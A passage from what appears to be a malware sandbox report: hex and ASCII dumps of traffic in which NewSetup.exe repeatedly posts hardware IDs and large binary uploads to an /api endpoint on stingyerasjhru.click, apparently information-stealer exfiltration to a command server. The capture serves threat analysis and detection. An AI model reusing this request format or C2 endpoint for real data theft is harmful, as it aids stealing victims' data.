                                                                                                    2024-12-27 21:40:00 UTC1369INData Raw: 33 48 42 42 4f 6c 67 7a 50 42 62 74 31 58 6b 6e 6b 38 46 4a 39 6d 65 44 46 30 66 47 66 42 65 6f 49 54 72 63 48 59 5a 32 4e 43 4b 52 64 33 42 45 41 51 64 7a 45 71 50 68 4e 32 43 62 6c 77 72 36 57 6f 4d 44 55 2f 39 55 4c 65 6b 50 48 76 77 67 77 6e 77 54 64 35 30 44 65 42 52 49 4e 54 35 57 6f 35 41 35 4a 73 4f 50 41 76 51 76 68 42 77 64 6f 42 4a 75 2f 33 4a 75 6b 55 72 53 54 31 70 37 6e 79 45 2f 58 41 74 77 63 30 69 6a 68 6a 6c 6e 67 4d 56 41 76 47 79 57 44 68 72 47 66 42 75 71 49 44 7a 51 43 70 64 66 4b 6c 7a 4b 4e 48 45 4b 58 69 67 69 47 71 32 65 64 6d 44 62 37 68 4c 79 4c 37 39 44 48 65 41 43 5a 4f 51 53 50 73 67 55 68 30 59 46 4c 2f 67 35 65 41 56 50 4c 69 52 56 6f 35 41 35 4a 73 4f 50 41 50 51 76 68 42 77 64 6f 42 4a 75 2f 33 4a 75 6b 55 72 53 54 31 70
                                                                                                    Data Ascii: 3HBBOlgzPBbt1Xknk8FJ9meDF0fGfBeoITrcHYZ2NCKRd3BEAQdzEqPhN2Cblwr6WoMDU/9ULekPHvwgwnwTd50DeBRINT5Wo5A5JsOPAvQvhBwdoBJu/3JukUrST1p7nyE/XAtwc0ijhjlngMVAvGyWDhrGfBuqIDzQCpdfKlzKNHEKXigiGq2edmDb7hLyL79DHeACZOQSPsgUh0YFL/g5eAVPLiRVo5A5JsOPAPQvhBwdoBJu/3JukUrST1p
                                                                                                    2024-12-27 21:40:00 UTC1369INData Raw: 53 56 54 4c 6a 35 56 35 4a 78 5a 4a 35 58 55 45 76 51 76 6a 45 30 46 75 45 4d 32 74 43 6f 79 77 56 61 48 53 68 4d 69 6b 58 64 78 52 41 46 2b 4d 6c 44 7a 30 33 59 6e 7a 39 46 63 74 43 2b 66 51 30 53 34 56 48 7a 38 64 48 4f 47 43 4d 41 49 56 43 58 63 4a 57 30 43 57 69 67 77 48 64 33 67 56 44 4b 45 78 31 48 34 58 6f 30 4a 53 2b 31 42 4c 4b 4d 5a 41 2b 73 49 68 30 41 58 49 4f 34 68 66 41 52 58 4f 58 4d 55 6f 38 59 35 65 4d 50 36 51 4c 31 2f 67 30 30 54 75 45 35 38 2f 47 63 77 31 42 32 51 55 31 68 6c 78 54 41 2f 47 78 63 6e 63 30 79 6a 68 69 70 75 77 38 55 53 34 69 2f 48 41 31 44 35 51 54 4b 6e 4e 53 2f 41 47 5a 5a 54 55 31 7a 68 47 6d 30 44 53 54 31 78 61 2b 37 61 62 7a 57 41 78 31 57 45 55 61 30 66 57 75 68 42 66 6f 67 67 4d 4d 6f 6b 76 6d 63 46 5a 63 39 31
                                                                                                    Data Ascii: SVTLj5V5JxZJ5XUEvQvjE0FuEM2tCoywVaHShMikXdxRAF+MlDz03Ynz9FctC+fQ0S4VHz8dHOGCMAIVCXcJW0CWigwHd3gVDKEx1H4Xo0JS+1BLKMZA+sIh0AXIO4hfARXOXMUo8Y5eMP6QL1/g00TuE58/Gcw1B2QU1hlxTA/Gxcnc0yjhipuw8US4i/HA1D5QTKnNS/AGZZTU1zhGm0DST1xa+7abzWAx1WEUa0fWuhBfoggMMokvmcFZc91


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    2192.168.2.649711172.67.157.2494435680C:\Users\user\Desktop\NewSetup.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-27 21:40:02 UTC285OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: multipart/form-data; boundary=POWTP03AGWE65AD7T
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 12858
                                                                                                    Host: stingyerasjhru.click
                                                                                                    2024-12-27 21:40:02 UTC12858OUTData Raw: 2d 2d 50 4f 57 54 50 30 33 41 47 57 45 36 35 41 44 37 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 36 41 30 38 44 46 32 37 43 33 32 38 46 31 43 30 42 39 43 42 44 44 32 36 38 43 43 37 43 44 0d 0a 2d 2d 50 4f 57 54 50 30 33 41 47 57 45 36 35 41 44 37 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 4f 57 54 50 30 33 41 47 57 45 36 35 41 44 37 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 62 57 39 76 62 6e 70 36
                                                                                                    Data Ascii: --POWTP03AGWE65AD7TContent-Disposition: form-data; name="hwid"FC6A08DF27C328F1C0B9CBDD268CC7CD--POWTP03AGWE65AD7TContent-Disposition: form-data; name="pid"2--POWTP03AGWE65AD7TContent-Disposition: form-data; name="lid"pqZnKP--bW9vbnp6
                                                                                                    2024-12-27 21:40:03 UTC1144INHTTP/1.1 200 OK
                                                                                                    Date: Fri, 27 Dec 2024 21:40:02 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=ivqelkff4iuoe0o1siae7tjp33; expires=Tue, 22 Apr 2025 15:26:41 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    X-Frame-Options: DENY
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M%2FSwUsuXhJlfMfUQRSnYAH861PGKXHPUmgywQP0M6aAZ5SjLg0uD71yGGxC6sdDZcfMbhfasRzre1WthU%2BS7Q2KlvLP%2BmdBJYCHRm%2FdgkOXjH89T%2BfFUnCcc%2BhkGL9LavtQHTnll3Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8f8c777a7cc3187d-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1565&rtt_var=622&sent=14&recv=17&lost=0&retrans=0&sent_bytes=2851&recv_bytes=13801&delivery_rate=1712609&cwnd=152&unsent_bytes=0&cid=53a0d0bf6352c990&ts=1135&x=0"
                                                                                                    2024-12-27 21:40:03 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                    2024-12-27 21:40:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    3192.168.2.649713172.67.157.2494435680C:\Users\user\Desktop\NewSetup.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-27 21:40:04 UTC286OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: multipart/form-data; boundary=849Y6J9LFXVPBSNM0J
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 15110
                                                                                                    Host: stingyerasjhru.click
                                                                                                    2024-12-27 21:40:04 UTC15110OUTData Raw: 2d 2d 38 34 39 59 36 4a 39 4c 46 58 56 50 42 53 4e 4d 30 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 36 41 30 38 44 46 32 37 43 33 32 38 46 31 43 30 42 39 43 42 44 44 32 36 38 43 43 37 43 44 0d 0a 2d 2d 38 34 39 59 36 4a 39 4c 46 58 56 50 42 53 4e 4d 30 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 34 39 59 36 4a 39 4c 46 58 56 50 42 53 4e 4d 30 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 62 57 39 76 62
                                                                                                    Data Ascii: --849Y6J9LFXVPBSNM0JContent-Disposition: form-data; name="hwid"FC6A08DF27C328F1C0B9CBDD268CC7CD--849Y6J9LFXVPBSNM0JContent-Disposition: form-data; name="pid"2--849Y6J9LFXVPBSNM0JContent-Disposition: form-data; name="lid"pqZnKP--bW9vb
                                                                                                    2024-12-27 21:40:05 UTC1142INHTTP/1.1 200 OK
                                                                                                    Date: Fri, 27 Dec 2024 21:40:05 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=9qeuvbp7bmv3t44haplk0io29g; expires=Tue, 22 Apr 2025 15:26:44 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    X-Frame-Options: DENY
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BSam%2Fu9tQjdX6Zhb1LG9ulng5TWpTd4%2BlYzUJPJDvGGG2%2B6ZuTEbYm03%2BF7vlAA9n3NYEM2DO20ey9XN0vWPwA2g3hOwmpW5A7n8qX2gC7S0lRjnU%2FK9rQCwQh6pbKKY9v6ZU7EcyA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8f8c77891b3e43d3-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1636&min_rtt=1636&rtt_var=614&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2852&recv_bytes=16054&delivery_rate=1784841&cwnd=236&unsent_bytes=0&cid=a7ba2afdd5386d31&ts=993&x=0"
                                                                                                    2024-12-27 21:40:05 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                    2024-12-27 21:40:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    4192.168.2.649714172.67.157.2494435680C:\Users\user\Desktop\NewSetup.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-27 21:40:06 UTC276OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: multipart/form-data; boundary=HBDVBRQF
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 19908
                                                                                                    Host: stingyerasjhru.click
                                                                                                    2024-12-27 21:40:06 UTC15331OUTData Raw: 2d 2d 48 42 44 56 42 52 51 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 36 41 30 38 44 46 32 37 43 33 32 38 46 31 43 30 42 39 43 42 44 44 32 36 38 43 43 37 43 44 0d 0a 2d 2d 48 42 44 56 42 52 51 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 48 42 44 56 42 52 51 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 62 57 39 76 62 6e 70 36 65 47 0d 0a 2d 2d 48 42 44 56 42 52 51 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73
                                                                                                    Data Ascii: --HBDVBRQFContent-Disposition: form-data; name="hwid"FC6A08DF27C328F1C0B9CBDD268CC7CD--HBDVBRQFContent-Disposition: form-data; name="pid"3--HBDVBRQFContent-Disposition: form-data; name="lid"pqZnKP--bW9vbnp6eG--HBDVBRQFContent-Dis
                                                                                                    2024-12-27 21:40:06 UTC4577OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 02 0e 8d a5 f6
                                                                                                    Data Ascii: 2+?2+?o?Mp5p_oI
                                                                                                    2024-12-27 21:40:07 UTC1139INHTTP/1.1 200 OK
                                                                                                    Date: Fri, 27 Dec 2024 21:40:07 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=1s8c317kqp2ron1q12muoqg83l; expires=Tue, 22 Apr 2025 15:26:46 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    X-Frame-Options: DENY
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1YCd%2BTDIKJ4Pf7IO76CjBfn5Jth%2Fr5Rj4b4FDWb7Hkw9DFbJWKVpmfU5MkxEWK%2FtikyCuqJOSb%2B18v9K9bedHo5cizPbcFfj4f2e2Rsns7e41vt8VGArjooLryej8iiytT9yvCtsFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8f8c77989a77424f-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1827&min_rtt=1745&rtt_var=819&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2853&recv_bytes=20864&delivery_rate=1215147&cwnd=233&unsent_bytes=0&cid=8cb6f45587d4ff56&ts=969&x=0"
                                                                                                    2024-12-27 21:40:07 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                    2024-12-27 21:40:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    5192.168.2.649724172.67.157.2494435680C:\Users\user\Desktop\NewSetup.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-27 21:40:09 UTC286OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: multipart/form-data; boundary=EI81MX42T8TGW0ASOT7
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 1237
                                                                                                    Host: stingyerasjhru.click
                                                                                                    2024-12-27 21:40:09 UTC1237OUTData Raw: 2d 2d 45 49 38 31 4d 58 34 32 54 38 54 47 57 30 41 53 4f 54 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 36 41 30 38 44 46 32 37 43 33 32 38 46 31 43 30 42 39 43 42 44 44 32 36 38 43 43 37 43 44 0d 0a 2d 2d 45 49 38 31 4d 58 34 32 54 38 54 47 57 30 41 53 4f 54 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 45 49 38 31 4d 58 34 32 54 38 54 47 57 30 41 53 4f 54 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 62 57
                                                                                                    Data Ascii: --EI81MX42T8TGW0ASOT7Content-Disposition: form-data; name="hwid"FC6A08DF27C328F1C0B9CBDD268CC7CD--EI81MX42T8TGW0ASOT7Content-Disposition: form-data; name="pid"1--EI81MX42T8TGW0ASOT7Content-Disposition: form-data; name="lid"pqZnKP--bW
                                                                                                    2024-12-27 21:40:11 UTC1141INHTTP/1.1 200 OK
                                                                                                    Date: Fri, 27 Dec 2024 21:40:11 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=e9ruc07jtjugvlkfa64j2p92fh; expires=Tue, 22 Apr 2025 15:26:49 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    X-Frame-Options: DENY
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M56Qf3bxZWgFrcunY0aa%2BIWtkn%2FPOn2L726Ccs8kMaCCBLo%2FQ5P8EoI%2FGbQ3HN25acM8RTHsD4YgLewgfrUBNnB%2F4Bgeo%2FqnDUSSQUPmF56wzzyXS9430npDErH9QE12poBjxsFdAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8f8c77aa789732e4-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1852&min_rtt=1851&rtt_var=697&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=2159&delivery_rate=1568206&cwnd=162&unsent_bytes=0&cid=1bc9648fd2d6a5fd&ts=1740&x=0"
                                                                                                    2024-12-27 21:40:11 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                    2024-12-27 21:40:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    6192.168.2.649732172.67.157.2494435680C:\Users\user\Desktop\NewSetup.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-27 21:40:13 UTC286OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: multipart/form-data; boundary=EDIB75P7HSSY7A9WE
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 588331
                                                                                                    Host: stingyerasjhru.click
                                                                                                    2024-12-27 21:40:13 UTC15331OUTData Raw: 2d 2d 45 44 49 42 37 35 50 37 48 53 53 59 37 41 39 57 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 36 41 30 38 44 46 32 37 43 33 32 38 46 31 43 30 42 39 43 42 44 44 32 36 38 43 43 37 43 44 0d 0a 2d 2d 45 44 49 42 37 35 50 37 48 53 53 59 37 41 39 57 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 45 44 49 42 37 35 50 37 48 53 53 59 37 41 39 57 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 62 57 39 76 62 6e 70 36
                                                                                                    Data Ascii: --EDIB75P7HSSY7A9WEContent-Disposition: form-data; name="hwid"FC6A08DF27C328F1C0B9CBDD268CC7CD--EDIB75P7HSSY7A9WEContent-Disposition: form-data; name="pid"1--EDIB75P7HSSY7A9WEContent-Disposition: form-data; name="lid"pqZnKP--bW9vbnp6
                                                                                                    2024-12-27 21:40:13 UTC15331OUTData Raw: 54 bc 6a 7f 46 6c ac 1a 7b e5 d2 90 3f a2 38 04 ba ce 58 b8 a2 88 bd 33 4d 37 50 f7 a2 1a c4 d1 dd 04 95 c1 40 1b 2c 1c d6 ea 97 ab 00 48 25 de 55 cb f3 9d 03 71 5f b8 77 d3 fd ef 58 1f 79 08 68 b5 bb 5f c6 89 ca cd d0 4e b0 ef 4c a0 ff a0 ee 0b 4e 12 50 51 42 6b cb ff 1b f8 16 c9 bf 78 c1 3e 5c d9 91 28 28 db 05 b8 fa 1c 04 3b 9d 73 1e 35 9c 28 d6 e5 12 5d fd 49 b9 f8 cd 78 33 63 d9 28 91 54 e6 87 3c db 5b a2 1d 7b d3 b5 77 23 73 b1 20 2d ce 48 09 9d 87 6a df 2a 9a f2 ea e2 e9 ac f6 52 7f fe 3f c3 f2 7f 8b 31 2f 00 ad 7e 47 70 1f 0d ea c9 e4 1e 5f 04 0c e3 60 0e 9a b4 7d 4a 60 50 91 f1 62 4f 4a 31 07 c4 fa 47 46 ff e5 31 06 0b 2d a3 7c 33 1d e1 c4 5c ce 38 f0 a9 a9 2d 4b 1d 0d 8f ad d1 f3 53 a1 da 47 df 0e 0f 02 1e 61 6a ea 23 76 bf 68 4e c9 ee d5 56 86
                                                                                                    Data Ascii: TjFl{?8X3M7P@,H%Uq_wXyh_NLNPQBkx>\((;s5(]Ix3c(T<[{w#s -Hj*R?1/~Gp_`}J`PbOJ1GF1-|3\8-KSGaj#vhNV
                                                                                                    2024-12-27 21:40:13 UTC15331OUTData Raw: 7f 48 43 38 01 78 e8 e9 c6 be e5 86 ff 73 82 7d 96 02 e8 8c bf cb d5 5e 27 e9 af f1 db 69 24 19 75 62 46 34 5f 0d fd 29 21 66 ae 32 77 0f 6f fd 03 31 a1 68 88 6a 10 d6 76 48 41 e8 bf 26 ea 11 33 73 8d b1 6c 84 ac f3 50 e0 32 ca b0 8f 21 f7 f4 0b 64 24 1c ab 8f e0 40 7b e2 52 95 36 cc c8 a6 c0 31 e1 c1 aa a5 18 06 f3 b6 63 a6 f0 a7 1c 8e db e5 95 a9 e2 7e 49 32 d3 6b be 71 c8 9b 38 e5 ec 6c 3e 92 ea 32 a5 14 b1 dd 6f c4 cb c9 b9 7a a5 10 b9 5d 5c 79 28 d2 49 07 c6 c8 e0 82 03 26 1e 09 7a ca 4f 27 e2 1b ff 26 19 55 0d ca c6 3f f3 97 47 a4 20 53 fa 9a 0d bd 5b a8 97 1f 64 1e bf 81 aa 4f 4d e9 a2 57 ce 5f fa 32 b3 7a 6a 70 53 73 f7 c7 90 47 c7 99 f9 7a 89 bb 1e 95 bb 43 0b 43 cd 57 d6 7d 44 8b 90 1c 98 30 e9 f5 ed ba da a0 98 63 f2 af 68 ed 71 d1 38 eb c5 a0
                                                                                                    Data Ascii: HC8xs}^'i$ubF4_)!f2wo1hjvHA&3slP2!d$@{R61c~I2kq8l>2oz]\y(I&zO'&U?G S[dOMW_2zjpSsGzCCW}D0chq8
                                                                                                    2024-12-27 21:40:13 UTC15331OUTData Raw: 0c 54 15 0e 7c 71 4c 95 ab 79 7b 0f a2 7d 26 48 5a 5b 4d 5a bd f4 c8 29 10 fd b8 65 73 f1 53 b0 24 6d 12 4c 7d 7e f9 c0 2b 5e 29 54 73 ef e2 b3 67 c3 4f 7b 0a bb fe 35 57 c4 0b 89 85 38 bd a9 dc 5c 3b 75 24 fa 05 a9 79 25 ea d8 29 ee 37 9e e3 c9 93 18 0c 80 fe 00 b0 9f 76 c5 d7 a4 ce cb 81 2a 69 32 bd d9 c7 02 c6 17 a1 3c 8f 8b 74 fe 5d ff 36 14 f8 0d 09 13 ff cc 1f 37 0a 97 51 2a 39 f2 c7 87 67 93 ec 9f 66 ba 01 f5 74 ab 80 ba 3d 5d a2 1a 33 59 2b 28 3b 56 a7 ce 37 03 60 17 ef 8e 86 55 5c 83 91 f0 d5 79 e5 83 27 39 12 7d e8 f7 ad 3f 77 9f 3e 0b b6 9e 7b 6e d0 c7 45 bb d5 36 9b 3b ef 9d 1c 08 df d2 3a c6 72 e9 2b 7e e4 44 55 54 9e 8b b9 10 c4 45 be f7 ef 8f a0 c9 72 0c 88 b8 c1 02 33 82 5c 1b 90 6f f3 77 73 bf 14 88 e6 4d b7 e3 40 04 0d 41 a4 4c 0f 84 26
                                                                                                    Data Ascii: T|qLy{}&HZ[MZ)esS$mL}~+^)TsgO{5W8\;u$y%)7v*i2<t]67Q*9gft=]3Y+(;V7`U\y'9}?w>{nE6;:r+~DUTEr3\owsM@AL&
